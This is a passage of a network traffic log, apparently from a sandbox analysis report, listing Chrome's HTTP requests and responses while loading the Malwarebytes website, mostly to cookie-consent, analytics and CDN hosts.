                                                                                                                                                                      cookie: _vwo_sn=0%3A1
                                                                                                                                                                      cookie: _vwo_uuid_v2=D6A380A65C80D9E635C14E26E5B5E452F|4446a6bbb870e56aef9d2aa1c522a1a7
                                                                                                                                                                      cookie: _vwo_ds=3%3Aa_0%2Ct_0%3A0%241673272142%3A4.53417754%3A%3A1_0%3A4_0%2C3_0%3A1
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      content-type: image/png
                                                                                                                                                                      content-length: 1853
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      cache-control: max-age=900
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:04 GMT
                                                                                                                                                                      etag: "405d1c3a6361d71:0"
                                                                                                                                                                      last-modified: Mon, 14 Jun 2021 21:21:23 GMT
                                                                                                                                                                      server: Microsoft-IIS/10.0
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-powered-by: ASP.NET
                                                                                                                                                                      x-cache: Miss from cloudfront
                                                                                                                                                                      via: 1.1 aae0a3ddd306e11f8c3d25a657078704.cloudfront.net (CloudFront)
                                                                                                                                                                      x-amz-cf-pop: AMS1-C1
                                                                                                                                                                      x-amz-cf-id: jDVes8i0dxmNlJhRb8tw1yo69yTASBNtlr7jm_AxyY5_dl1tqKkowA==
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dev.visualwebsiteoptimizer.com/lib/622914.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.96.102.137:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /lib/622914.js HTTP/2.0
                                                                                                                                                                      host: dev.visualwebsiteoptimizer.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://api.demandbase.com/api/v2/ip.json?key=5527c2aa519592df7d44a24d0105731b
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      65.9.86.122:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /api/v2/ip.json?key=5527c2aa519592df7d44a24d0105731b HTTP/1.1
                                                                                                                                                                      Host: api.demandbase.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      Origin: https://www.malwarebytes.com
                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                      Referer: https://www.malwarebytes.com/
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 401 Unauthorized
                                                                                                                                                                      Content-Type: text/plain;charset=utf-8
                                                                                                                                                                      Content-Length: 12
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:49:03 GMT
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Access-Control-Allow-Origin: https://www.malwarebytes.com
                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                      Access-Control-Expose-Headers:
                                                                                                                                                                      Access-Control-Max-Age: 7200
                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                      WWW-Authenticate: DemandBase API v2
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Request-ID: fe0c1f12-bddc-433f-b054-4a66510eb8ce
                                                                                                                                                                      Vary: Origin
                                                                                                                                                                      X-Cache: Error from cloudfront
                                                                                                                                                                      Via: 1.1 043fc2faaa02eeb59193e3fa300adb6a.cloudfront.net (CloudFront)
                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-C1
                                                                                                                                                                      X-Amz-Cf-Id: 6yW6VHM_BH6YFSbF1M8rRVWiJc35HquspSl16gN7zKgF0ccp6Vihdw==
                                                                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                      permissions-policy: accelerometer=(), camera=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), payment=(), usb=(), interest-cohort=()
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/otSDKStub.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /scripttemplates/otSDKStub.js HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:04 GMT
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      content-length: 8053
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      content-md5: WdCEPqU1pnnoNr/cT9hHyQ==
                                                                                                                                                                      last-modified: Fri, 06 Jan 2023 16:07:56 GMT
                                                                                                                                                                      etag: 0x8DAF0002C908A6C
                                                                                                                                                                      x-ms-request-id: 98f26f26-d01e-013d-372c-222b95000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: max-age=86400
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 46806
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a72df041e71-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/6.38.0/otBannerSdk.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /scripttemplates/6.38.0/otBannerSdk.js HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:04 GMT
                                                                                                                                                                      content-type: application/javascript
                                                                                                                                                                      content-length: 89624
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      content-md5: jz950M8ZW7RakPP2zlLHZQ==
                                                                                                                                                                      last-modified: Thu, 21 Jul 2022 06:31:17 GMT
                                                                                                                                                                      etag: 0x8DA6AE29E465D1D
                                                                                                                                                                      x-ms-request-id: 7e08b95c-701e-0174-68d7-9c18f5000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: max-age=86400
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 18249
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a75b9121e71-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/logos/static/powered_by_logo.svg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /logos/static/powered_by_logo.svg HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                      content-md5: Y+c301RBZNK39PvKQWrIBw==
                                                                                                                                                                      last-modified: Fri, 06 Jan 2023 16:07:59 GMT
                                                                                                                                                                      x-ms-request-id: f5a88de3-e01e-011c-4c43-2246a4000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: max-age=86400
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 18287
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a78cb4d1e71-AMS
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvODkuMC40Mzg5LjExNBIQCZ7yPG9h4EhxEgUNeG8SGQ==?alt=proto
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.250.179.202:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /v1/pages/ChRDaHJvbWUvODkuMC40Mzg5LjExNBIQCZ7yPG9h4EhxEgUNeG8SGQ==?alt=proto HTTP/2.0
                                                                                                                                                                      host: content-autofill.googleapis.com
                                                                                                                                                                      x-goog-encode-response-if-executable: base64
                                                                                                                                                                      x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                      x-client-data: CIr6ygE=
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/consent/82971089-2677-4e1e-8fab-44444f76330b/82971089-2677-4e1e-8fab-44444f76330b.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /consent/82971089-2677-4e1e-8fab-44444f76330b/82971089-2677-4e1e-8fab-44444f76330b.json HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:04 GMT
                                                                                                                                                                      content-type: application/x-javascript
                                                                                                                                                                      content-length: 1722
                                                                                                                                                                      cache-control: public, max-age=86400
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      content-md5: xRLaImDOyX0qRBCU8O7tmg==
                                                                                                                                                                      last-modified: Thu, 01 Dec 2022 17:04:00 GMT
                                                                                                                                                                      etag: 0x8DAD3BE0A9504DA
                                                                                                                                                                      x-ms-request-id: ee9921c9-001e-00de-73e1-08884f000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 17179
                                                                                                                                                                      expires: Tue, 10 Jan 2023 12:49:04 GMT
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a73ec09b766-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/consent/82971089-2677-4e1e-8fab-44444f76330b/eef9d10b-0829-4459-966f-9c7317989fae/en.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /consent/82971089-2677-4e1e-8fab-44444f76330b/eef9d10b-0829-4459-966f-9c7317989fae/en.json HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-type: application/x-javascript
                                                                                                                                                                      content-length: 13477
                                                                                                                                                                      cache-control: public, max-age=86400
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      content-md5: z/U+4nq8/JTLdEKEzbQHmA==
                                                                                                                                                                      last-modified: Thu, 01 Dec 2022 17:04:17 GMT
                                                                                                                                                                      etag: 0x8DAD3BE14B4D868
                                                                                                                                                                      x-ms-request-id: eec5e84a-001e-00de-27f7-08884f000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 79338
                                                                                                                                                                      expires: Tue, 10 Jan 2023 12:49:05 GMT
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a766ebab766-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/6.38.0/assets/v2/otPcPanel.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /scripttemplates/6.38.0/assets/v2/otPcPanel.json HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      content-length: 13296
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      content-md5: BJ08KLAvpzZpuIY3VesHLg==
                                                                                                                                                                      last-modified: Thu, 21 Jul 2022 06:31:11 GMT
                                                                                                                                                                      etag: 0x8DA6AE29AA07224
                                                                                                                                                                      x-ms-request-id: 3b7fee91-d01e-005f-18e1-082a18000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: max-age=86400
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 15189
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a774f7eb766-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/6.38.0/assets/otCommonStyles.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /scripttemplates/6.38.0/assets/otCommonStyles.css HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      content-md5: TLLtdkuMahUQRVIfmZNHNw==
                                                                                                                                                                      last-modified: Thu, 21 Jul 2022 06:31:23 GMT
                                                                                                                                                                      x-ms-request-id: c42d6709-001e-0152-3ce1-088341000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: max-age=86400
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 11952
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a774f80b766-AMS
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.18.27.85:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /cookieconsentpub/v1/geo/location HTTP/2.0
                                                                                                                                                                      host: geolocation.onetrust.com
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:04 GMT
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      access-control-allow-headers: Content-Type
                                                                                                                                                                      access-control-allow-methods: GET, OPTIONS
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a754eaab8f4-AMS
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://snap.licdn.com/li.lms-analytics/insight.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      95.101.74.227:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /li.lms-analytics/insight.min.js HTTP/2.0
                                                                                                                                                                      host: snap.licdn.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      last-modified: Sun, 08 Jan 2023 11:26:38 GMT
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-type: application/x-javascript;charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=72888
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-length: 482
                                                                                                                                                                      x-cdn: AKAM
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://snap.licdn.com/li.lms-analytics/insight.beta.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      95.101.74.227:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /li.lms-analytics/insight.beta.min.js HTTP/2.0
                                                                                                                                                                      host: snap.licdn.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      last-modified: Sun, 08 Jan 2023 11:26:37 GMT
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-type: application/x-javascript;charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=73005
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-length: 4777
                                                                                                                                                                      x-cdn: AKAM
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://unpkg.com/web-vitals@1.1.0/dist/web-vitals.umd.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.122.175:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /web-vitals@1.1.0/dist/web-vitals.umd.js HTTP/2.0
                                                                                                                                                                      host: unpkg.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-type: application/javascript; charset=utf-8
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: public, max-age=31536000
                                                                                                                                                                      last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                                                                      etag: W/"1060-9qPq4bqeRCeFWudNuS98Bp0PQDY"
                                                                                                                                                                      via: 1.1 fly.io
                                                                                                                                                                      fly-request-id: 01GG9CAAF2FGBQNQFGEB98RB16-ams
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 6506323
                                                                                                                                                                      vary: Accept-Encoding
